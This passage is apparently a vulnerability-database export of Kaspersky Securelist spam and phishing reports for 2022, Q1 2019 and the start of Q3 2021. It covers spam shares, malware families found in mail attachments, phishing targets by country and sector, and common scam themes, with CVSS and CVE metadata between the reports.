Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That&#x27;s an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims&#x27; devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims&#x27; devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year&#x27;s ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger&#x27;s users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries&#x27; markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we&#x27;ve seen an increase in targeted phishing attacks where scammers don&#x27;t immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were &quot;official&quot;, despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the &quot;bonus&quot; evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n&quot;Nigerian prince&quot; scammers also had a close eye on Q3&#x27;s sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of &quot;holiday deals&quot; supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor 